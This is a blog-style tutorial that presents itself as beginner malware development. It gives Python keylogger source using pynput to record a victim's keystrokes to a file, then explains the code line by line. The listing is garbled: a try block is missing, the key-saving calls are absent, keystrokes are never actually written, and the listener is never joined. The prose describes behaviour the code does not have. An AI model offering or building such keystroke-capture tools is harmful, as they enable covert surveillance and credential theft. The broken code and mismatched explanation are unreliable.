Keylogger :- A Basic Malware

Keyloggers are tools that record what a person types on a device. While there are legitimate and legal uses for keyloggers, many uses for keyloggers are malicious. In a keylogger attack, the keylogger software records every keystroke on the victim’s device and sends it to the attacker.

I am a beginner in Python and especially malware development in Windows. So I have made a keylogger for Windows, that is pretty basic, but probably a bit different from others.

*Please note that it was written for EDUCATIONAL PURPOSES
A keylogger is a tool that can track and record keystrokes, typically used to monitor keyboard activity. It can exist as either hardware or software, but this article will focus primarily on software keyloggers. When a key is pressed, the keylogger captures the input and can send it to its intended destination. Keyloggers may or may not be considered malware, depending on the context in which they are used. For example, parents may use keyloggers to monitor their child’s computer activity, or employers may use them to ensure that employees are following company policies. These types of applications are often referred to as Possibly Unwanted Programs (PUP) or Possibly Unwanted Applications (PUA).
Before start the program you have to install the ‘pynput ‘ library if you haven’t already. You can do this by running the following command in your terminal or command prompt:

pip install pynput

Let’s write the program

import pynput
from pynput.keyboard import Key, Listener

keys = []

def press(key):

        print('alphanumeric key {0} pressed'.format(key.char))
    except AttributeError:
        print('special key {0} pressed'.format(key))

def write_file(keys):
    with open('test.txt', 'w') as f:
        for key in keys:
            # removing ' '
            k = str(key).replace("'", "")

            # every keystroke for readability
            f.write(' ')

def release(key):
    print('{0} released'.format(key))
    if key == Key.esc:
        # stop listener
        return False

with Listener(on_press=press, on_release=release) as listener:

The program starts by importing the necessary modules from pynput.

It initializes an empty list called ‘keys‘ to store the captured keystrokes.

The ‘press‘ function is defined, which is called whenever a key is pressed. Inside this function, the pressed key is appended to the keys list, and then the ‘write_file‘ function is called to save the captured keystrokes to a file.

The ‘write_file‘ function takes the keys list as input and opens a file named ‘test.txt‘ in write mode. It iterates over each key in the list, removes the single quotes around the key representation (to improve readability), and writes the key value to the file. Additionally, it writes a space character after each key for readability purposes.

The ‘release‘ function is defined, which is called when a key is released. Inside this function, it prints the released key. If the released key is the “Esc” key, it returns False to stop the listener and terminate the program.

The program enters a with statement to create a Listener object from ‘pynput‘ using the ‘press‘ and ‘release‘ functions. The listener is responsible for capturing the keyboard events.

The listener starts capturing keyboard events using the listener.join() method. It will keep running in the background and capturing keystrokes until the program is terminated.

When executed, the program will log all the keystrokes in real-time and save them to the ‘test.txt‘ file. The program will also print a message indicating whether the pressed key is alphanumeric or a special key.